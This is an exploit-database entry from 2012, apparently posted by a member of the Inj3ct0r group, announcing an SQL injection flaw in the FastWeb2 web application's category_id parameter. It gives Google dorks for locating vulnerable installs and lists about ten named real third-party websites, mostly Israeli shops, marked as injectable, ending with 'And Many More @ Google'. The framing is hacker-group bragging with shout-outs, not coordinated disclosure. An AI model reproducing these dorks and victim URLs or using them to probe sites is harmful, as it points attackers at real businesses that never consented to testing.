FastWeb2 - SQL Injection Vulnerability



EKU-ID: 1705 CVE: OSVDB-ID:
Author: TheCyberNuxbie Published: 2012-03-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Official Website: http://www.1337day.com                        0
1  [+] Support E-mail  : mr.inj3ct0r[at]gmail.com                      1
0                                                                      0
1                ##########################################            1
0                I'm NuxbieCyber Member From Inj3ct0r Team             1
1                ##########################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

========================================================================
<<<|>>>          FastWeb2 - SQL Injection Vulnerability          <<<|>>>
========================================================================
                                                         
- Discovered By:
||| TheCyberNuxbie - Independent Security Research |||
<<< staff@thecybernuxbie.com >>> YM: nux_exploit
[ www.thecybernuxbie.com ] $ CP: +62856-2538-963

- Info WebApps:
This Content Develop By FastWeb2:
http://fastweb2.com/

- Google Dork:
inurl:"/cat_prod.php?category_id="
inurl:"/fw2_landpage.php?category_id="

- Exploit Concept:
http://lokalisasi/WebApps/cat_prod.php?category_id=[SQL Injection]
http://lokalisasi/WebApps/fw2_landpage.php?category_id=[SQL Injection]

- Sample WebApps Vuln SQLi:
http://oriella.co.il/cat_prod.php?category_id=172' + [SQL Injection]
http://2life.co.il/cat_prod.php?category_id=360' + [SQL Injection]
http://fastweb2.com/cat_prod.php?category_id=234' + [SQL Injection]
http://taanug-matok.com/cat_prod.php?category_id=168' + [SQL Injection]
http://adamshalem.com/cat_prod.php?category_id=104' + [SQL Injection]
http://bonbonita.co.il/cat_prod.php?category_id=184' + [SQL Injection]
http://shop.idan-hadli.co.il/cat_prod.php?category_id=315' + [SQL Injection]
http://bt-el.com/cat_prod.php?category_id=184' + [SQL Injection]
http://lila.fastlist2.net/fw2_landpage.php?category_id=61' + [SQL Injection]
http://mytipool.fastlist2.net/fw2_landpage.php?category_id=44' + [SQL Injection]
, And Many More @ Google...!!!

-:>>> Special Thanks <<<:-
*** 1337day Inj3ct0r TEAM ***
...:::' All Member & Staff Inj3ct0r TEAM ':::...
[ r007er, Sid3^effects, r4dc0re, CroSs, KedAns-Dz, indoushka ]
[ SeeMe, KnocKout, ZoRLu, anT!-Tr0J4n, Kalashinkov3, Angel Injection ]
[ cr4wl3r, team_elite, erytronic, r4h0x, cyberbag0r, Denc0plax, AlexMx ]
[ cyberlog, donyskynet, elmonny, Hmei7, Ketek, fazzta, eidelweiss ]
[ kaMtiEz, g3mbeL_YCL, YazidNoeha, AfniGates, Puzy_4ngeLz, Reynaey ,etc ]
#########################################################################
 
[ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ]

Me @ Solo Raya, 19 March 2012 @ 02:25 PM. AntiSecureCrew IT-Terminator
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$